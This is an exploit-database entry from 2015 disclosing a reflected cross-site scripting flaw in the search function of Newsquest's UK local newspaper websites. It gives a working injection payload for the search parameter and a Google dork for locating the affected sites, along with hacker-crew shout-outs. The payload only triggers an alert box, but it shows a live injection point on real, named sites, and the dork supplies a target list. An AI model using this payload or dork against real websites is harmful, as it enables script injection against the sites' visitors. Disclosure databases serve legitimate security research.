Newsquest's UK XSS Vulnerability

2015.08.25
Credit: R3NW4
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: [Newsquest's UK XSS Vulnerability] # Google Dork: [This site is part of Newsquest's audited local newspaper network | A Gannett Company] # Date: [24-8-2015] # Exploit Author: [R3NW4] # Platform: (WebApps) # Versions: [ all ] # Greetz: XSSposed.org - All Kurdish Hackers ----------------------- Exploit: site.com/search/?search="+autofocus+onfocus%3D"alert('XSSPOSED') ------------------------- i love these l33ts: Agd_Scorp-Zombie_KsA-TurkGuvnligi-Pakbugs-TIGER M@TE-SEA-Madleets-Z0mbi3_Ma-SQL_Master-The Pro ------------------------ # https://twitter.com/R3NW4

References:

https://twitter.com/R3NW4


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top